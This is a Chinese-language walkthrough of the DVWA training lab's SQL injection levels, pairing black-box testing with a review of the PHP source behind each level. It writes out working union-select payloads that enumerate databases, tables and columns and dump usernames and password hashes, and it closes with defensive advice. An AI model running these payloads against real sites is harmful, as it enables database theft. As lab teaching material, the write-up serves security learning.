前言:
DVWA靶场的sql注入有三个难度等级,通过黑盒注入结合代码审计的形式做一下这个靶场
知识储备:
需要有php、mysql的基础知识,了解sql注入的基本原理
环境
使用VM加载靶机的.ova
文件,VM的虚拟机都是可以加载的。
靶机百度网盘下载链接:
https://pan.baidu.com/s/1KaXy5KnXP7Td8s-3zPgalw 密码: jqq7
对于有回显的注入一般的思路就是:拼接sql语句使得查询结果可以显示在页面上。最终得到表名,字段名等敏感数据。
low等级难度
注入过程:
输入合法参数1
,页面正常输出,有回显位,输入的内容在url中可见,说明是get类型传参,参数是id
查看闭合方式
1 and 1=2
不报错,页面内容正常显示,不是整型闭合
1' and 1=2
报错 说明'
导致语法错误
1' and 1=2 --+
,页面无内容,但语法正确
即闭合方式:'
对于有回显的情况,尝试报错注入的思路
查看字段数
1' order by 2
页面正常
1' order by 3 --+
//页面报错
得到字段数为:2
union查询 库-表-字段
查询库名和数据库用户名:1.1' union select user(),database() --+
查询当前数据库的所有表
1.1'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
查看users表中的所有字段
1.1'union select 1,group_concat(column_name) from information_schema.columns where table_name='users'--+
源码分析:
<?php
if(isset($_GET['Submit'])){
// Retrieve data
$id = $_GET['id']; //没有对$id 做任何的过滤与检查
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );// 没有关闭错误提示
$num = mysql_numrows($result);
$i = 0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
$last = mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
?>
从源码中可以看出:
- 没有对输入的参数(
$id
)做任何的处理 - 没有关闭
mysql_error()
,给攻击者提供攻击的方便
medium
查看闭合方式
尝试单引号闭合
1' and 1=2 --+
发现单引号被转义了,猜测是宽子节注入
依然报错,常见的闭合方式试了一遍,发现是整型闭合方式
1 and 1=1
正常,1 and 1=2
无内容
union查询库-表-字段
知道了闭合方式,接下来的步骤和low
一样
获取所有数据库:1.1 union select group_concat(schema_name),2 from information_schema.schemata
-- 查看当前数据库的表名
id=1.1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+
-- 查看users表的所有字段,其中users表用的是16进制
?id=1.1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
-- 查看users表的user字段和password字段的内容
?id=1.1 union select group_concat(user),group_concat(password) from users
源码分析
<?php
if (isset($_GET['Submit'])) {
// Retrieve data
$id = $_GET['id'];
// 对传参中的特殊字符做了转义
$id = mysql_real_escape_string($id);
// 整型闭合方式
$getid = "SELECT first_name, last_name FROM users WHERE user_id = $id";
// 开启了错误提示
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num = mysql_numrows($result);
$i=0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
$last = mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
?>
相对于medium
的加固点在于对输入的参数多了特殊字符的转义,使得单引号双引号无法起到闭合作用,使得构造了的sql语句成了字符串的一部分,无法被mysql执行。
缺陷:虽然进行了特殊字符的转义,但是闭合方式却使用的是整型闭合,这样使得特殊字符转义没有起到真正的作用。
high
high
级别是一种预防sql注入的安全写法
源码分析
<?php
if (isset($_GET['Submit'])) {
// Retrieve data
$id = $_GET['id'];
$id = stripslashes($id);
$id = mysql_real_escape_string($id);
if (is_numeric($id)){
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
$result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
$num = mysql_numrows($result);
$i=0;
while ($i < $num) {
$first = mysql_result($result,$i,"first_name");
$last = mysql_result($result,$i,"last_name");
echo '<pre>';
echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
echo '</pre>';
$i++;
}
}
}
?>
代码分析
$id = stripslashes($id);
在php5之前,magic_quotes_gpc默认是开启的。这个选项一旦开启,相当于对GET``POST``COOKIE
类型的传参进行addslashes()
处理来预防sql注入。但是在实际开发中往往会关闭这个选项;这里的用stripslashes($id)
来抵消了addslashes();然后使用mysql_real_escape_string($id);
来转义特殊字符;
mysql_real_escape_string() 调用mysql库的函数 mysql_real_escape_string, 在以下字符前添加反斜杠: \x00, \n, \r, , ', " 和 \x1a.
自 PHP 5.5.0 起已废弃,并在自 PHP 7.0.0 开始被移除
is_numeric($id)
使得$id
参数的值只能是数字或数字字符串- 使用了单引号闭合,结合
is_numeric($id)
和mysql_real_escape_string($id)
使得单引号无法闭合
is_numeric($id)
使得传参只能含有数字或字符串。突破is_numeric()
函数的方法是通过对payload
进行hex编码
,由于是单引号闭合,传输到mysql中的是字符串,不能起到sql语句的作用,所以无法注入。
sql注入的防护思考
- 对于数字型,可以使用if语句,并且作为is_number()函数作为判断条件进行防御
- 对于字符型注入用
addslashes
等函数进行过滤
sql注意防护措施
代码层面
- 对输入进行严格的转义和过滤(high级别是转义)
- 预编译sql
网络层面
- 通过WAF进行防护;